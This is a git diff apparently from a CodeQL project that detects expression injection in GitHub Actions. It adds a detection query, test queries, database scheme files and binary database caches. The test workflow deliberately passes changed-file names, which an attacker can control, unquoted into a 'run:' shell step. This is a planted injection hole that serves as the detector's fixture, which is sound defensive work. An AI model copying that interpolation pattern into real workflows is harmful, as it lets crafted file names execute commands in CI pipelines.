/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] Log file was started late. +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json +[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" + ] +[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. +[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Terminating normally. diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3dbf073c49924685cbbad30b59944af574c77ae9 GIT binary patch literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& literal 0 HcmV?d00001 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql new file mode 100644 index 000000000000..2e358f3c30bd --- /dev/null +++ b/ql/lib/test/test.ql @@ -0,0 +1,59 @@ +import codeql.actions.ast.internal.Actions +import codeql.actions.Ast +import codeql.actions.Cfg as Cfg +import codeql.actions.DataFlow +import codeql.Locations + +query predicate files(File f) { any() } + +query predicate yamlNodes(YamlNode n) { any() } + +query predicate jobNodes(JobStmt s) { any() } + +query predicate stepNodes(StepStmt s) { any() } + +query predicate usesNodes(UsesExpr s) { any() } + +query predicate usesSteps(UsesExpr call, string argname, Expression arg) { + call.getArgument(argname) = arg +} + +query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } + +query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr } + +query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run } + +query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } + +query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) { + id = va.getStepId() and var = va.getVarName() +} + +query predicate orphanVarAccesses(ExprAccessExpr va, string var) { + var = va.getExpression() and + not exists(AstNode n | n = va.getParentNode()) +} + +query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) { + var = va.getExpression() and + parent = va.getParentNode() +} + +query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } + +query predicate cfgNodes(Cfg::Node n) { any() } + +query predicate dfNodes(DataFlow::Node e) { any() } + +query predicate exprNodes(DataFlow::ExprNode e) { any() } + +query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } + +query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } + +query predicate usesIds(UsesExpr s, string a) { s.getId() = a } + +query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } + +query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } diff --git a/ql/lib/test/test.yml b/ql/lib/test/test.yml new file mode 100644 index 000000000000..2760a6c3d35f --- /dev/null +++ b/ql/lib/test/test.yml @@ -0,0 +1,36 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme new file mode 100644 index 000000000000..20d83c71ee67 --- /dev/null +++ b/ql/lib/yaml.dbscheme @@ -0,0 +1,80 @@ +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats new file mode 100644 index 000000000000..1c35ae984020 --- /dev/null +++ b/ql/lib/yaml.dbscheme.stats @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql new file mode 100644 index 000000000000..f8d6e0c804b6 --- /dev/null +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -0,0 +1,37 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user." diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 000000000000..56f10b81e0c7 --- /dev/null +++ b/ql/src/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.7 + codeql/dataflow: + version: 0.1.7 + codeql/ssa: + version: 0.2.7 + codeql/typetracking: + version: 0.2.7 + codeql/util: + version: 0.2.7 + codeql/yaml: + version: 0.2.7 +compiled: false diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml new file mode 100644 index 000000000000..f4c43168664a --- /dev/null +++ b/ql/src/qlpack.yml @@ -0,0 +1,14 @@ +--- +library: false +name: codeql/actions-queries +version: 0.0.1 +groups: + - actions + - queries +suites: codeql-suites +extractor: yaml +defaultSuiteFile: codeql-suites/actions-code-scanning.qls +dependencies: + codeql/actions-all: ${workspace} +warnOnImplicitThis: true +tests: test diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json new file mode 100644 index 000000000000..9e26dfeeb6e6 --- /dev/null +++ b/ql/src/test-db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml new file mode 100644 index 000000000000..1dedebb70bed --- /dev/null +++ b/ql/src/test-db/codeql-database.yml @@ -0,0 +1,10 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +creationMetadata: + cliVersion: 2.16.1 + creationTime: 2024-02-03T09:17:52.592220Z +finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..9c1ea6cdeb296b714876d0e928d9978e9ec788c9 GIT binary patch literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..d14fdc5df9e27d6e8465f5feee0cd63125b6c0c2 GIT binary patch literal 28 TcmZQz00Slng&^}g^^O4m1iu0A literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/header new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|N8l!2HLh-`p#3Y2XNq&Gp?c0l?zlx+`Grw3&_0NE3vY)2sb7L@J8 Rz`z934>Hpk$nJ%*T>#m>2kQU; literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#2#e new file mode 100644 index 0000000000000000000000000000000000000000..aa6e82a1af6251f999da1af2e24d6aa1a2d5e799 GIT binary patch literal 80 zcmZQzU|{$?SD_V1DKjuI8UyJRAZ-GqHvwr=AblH1n*p&N5Ss(>L?E^R;#)v$$-uy5 N3#6@pbT5#$1^|N{2($nI literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TNode-56603d11#3#eet new file mode 100644 index 0000000000000000000000000000000000000000..9dd66f44ba43d16112ac3705b3f6dc6cd2675f8b GIT binary patch literal 4776 zcmXxl1+pO@WSSKB zOUbk;?hlgbQak`8)2Eo{MrKIysvwy$#cP0MrWCIUl9^MyHb{Dx%aR$$Tl^8zihV9uATP zQal1AtUKNhB&<6g2@=*F9{`d*DLx1!>;pUsB#Wf@Fp#h>@DU(cEX7BGgnfcXgM@v8 zj|It+DLx(~>>GR%NS03V$sk!K#ixQ~*%Y4+680HB6C~_2d^SjyPw}}R>6hX$DOn-K z7l4F)h&xlVVv5ItWI&292FXe(z7!p`+wif;tT>M6bnB!tVskZ=z0gCH50;)g)8L5d#%$%ZL@ z3?v(+_z93~oHDm&ew+Bdnct?mncrr*ncwERnco(=nctSWncr5rncvpBncp_Lncud$ zncsH0ncw!hnICgwF3tP~<^5YWFRdMY|29Ylr;NV~lATigeoBU<_(PEFoZ^o_!aagN z1_}2F{uCs;rTBA@aIfGmL9%;_zXr*$6n_g6?j8IcNcK$e4dG+_UxfSJNkJ?iq55=3XJE>UG*|ou=2*r|W_G49z`2&eR*X z**Z&as?XM&>vQy$`drO9Cg*9+Eg7RZr{sLixg-~8&L!#8JC$0k3pMACjMbboa*-a| zCii|lKh6=kL~}04rJ8d=F4LR?a=B*TlPmPdHu-;|zMp+fuF~vda&^p_rIl-R)~#}_ z&N@}D(^;3w^*ZZNxj|RWZ5W92rT=T^C0=ebqx z(0NXkJ9VB*lgIT z`bGVVeo6nPU)F!4j()qm=NI{T`|H_(6Ujdb=|jc=m=)tl+;yBgo3 z?JjvKZ>94=d25}0S>9G>UzWGm-&f4ZhB9heO=>w z>+X8E&OWd45xR%oUuWOf_yKwneX!0ssPRK|&Ov#Uo?IWUb1rK9NIj)KR_C15`0;vb zeS*%psqvHawE7gCb5!G}>FMqkHM|b5_9=Zss?qZswPBTjS0A=GM*pa*k`fncuv+nP1LzjW_d~UpMnxKsWR2 Yt(*BRs5|TDwz@2&oB8$8&HNVrAKWXY0ssI2 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 b/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7 new file mode 100644 index 0000000000000000000000000000000000000000..5d863c8ae718a6bd8aef9eef33ef17233531c555 GIT binary patch literal 16 RcmZQz00Tx4DWv-TKL7)*0w(|f literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Cfg#843d753d--Make-Locations#e31d5b03--Location-Cfg#f90a6699--Implementation---Cached--TSplits-cdffdde7#0# 